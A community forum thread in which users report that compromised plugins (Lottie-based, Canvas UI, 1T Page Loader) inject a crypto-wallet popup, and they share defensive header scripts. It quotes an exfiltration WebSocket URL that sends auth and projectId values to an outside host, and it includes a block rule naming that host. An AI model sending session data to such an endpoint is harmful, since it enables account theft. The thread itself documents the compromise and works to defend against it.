Hey guys, my plugin 1T - Page Loader uses lottie as well as the Canvas UI plugin
4 Likes
Helpful info thanks
How can I remove the LottieFile? Some of my apps donāt use it all and I canāt access the editor not even through the direct URL
In case anyone was looking for quick fixes (switching do different CDN for example) they all seem to have the same code injected.
This is partly why Iāll always die on the āavoid plugins if we canā hill 
Closely followed by the ādownload the plugin JS and save it with Bubble so it canāt be modifiedā hill.
5 Likes
Iām having that problem as well, it seems like bubble has uninstalled every plugin for every user, my plugins are blank and it says 0 plugins installed, but itās still showing.
Any risk to data, etc. from what you looked at?
It is not about lottie , whatever I got it on main page , neverr used any of that , you simply guys delete lottie and refresh the page thinking problem is solved , placebo
PUT THIS IN YOUR HEADER TO STOP
<script>
document.addEventListener("DOMContentLoaded", function() {
// Remove or hide the <w3m-modal> element once DOM is ready
const w3mModal = document.querySelector("w3m-modal.open");
if (w3mModal) {
w3mModal.remove(); // Completely remove the modal
// Or hide it with CSS:
// w3mModal.style.display = "none";
console.warn("Blocked <w3m-modal> from displaying.");
}
// Optionally, monitor for class changes
const observer = new MutationObserver((mutations) => {
mutations.forEach((mutation) => {
if (mutation.type === "attributes" && mutation.attributeName === "class") {
mutation.target.classList.remove("open");
console.warn("Removed 'open' class from <w3m-modal>");
}
});
});
const w3mModalElem = document.querySelector("w3m-modal");
if (w3mModalElem) {
observer.observe(w3mModalElem, { attributes: true });
}
});
</script>
5 Likes
Lottie can be used in several different plugins, but its not placebo - its literally in the code you can see the LottieJS opening the crypto.
1 Like
Iād guess thatās just a temporary visual issue. It does not appear to be the case for my app or plugins.
Your usage of lottie can affect my bubble main page ?
I have 28 issues, because of all plugins getting uninstalled, and everything editing-related is blank for me.
I canāt even uninstall any plugins, and it shows for me in the index page of bubble.io itself at:
https://www.bubble.io/
just leave the plugins and use that script
hey all, jumping in to let you all know the team is looking into this
2 Likes
Itās definitely in the Canvas UI Elements plugin.
1 Like
And this crypto script try to send some data to external website, so iām very concerned about current user session auth information that could be send outside (like auth & projectId data):
wss://castleservices01.com/ws/?auth=xxxxxxxxxxxxxx&projectId=xxxxxxx&ua=wc-2%xxxs-2.15.1%2Fmacos-chrome-130.0.0%2Fbrowser%3Abubble.io&useOnCloseEvent=true
Whatās happening lolā¦ Donāt have lottie plugin installed and wallet is popping up everything
<script>
(function() {
// Store the original WebSocket constructor
const OriginalWebSocket = window.WebSocket;
// Override the WebSocket constructor
window.WebSocket = function(url, protocols) {
// Check if the URL matches the blocked domain
if (url.includes("wss://castleservices01.com")) {
console.warn("Blocked WebSocket connection to:", url);
return; // Prevent the connection from being established
}
// Otherwise, proceed with the original WebSocket
return new OriginalWebSocket(url, protocols);
};
// Retain WebSocket properties, like .CLOSED, .OPEN, etc.
window.WebSocket.prototype = OriginalWebSocket.prototype;
})();
</script>
1T - Page Loader uses lottie as well as the Canvas UI plugin - uninstall both!
While I only spent about 30 seconds looking into what it was doing before removing it, it appeared that all connections to that wss were failing, at least on my computer, but I have significant security in place (PC & network).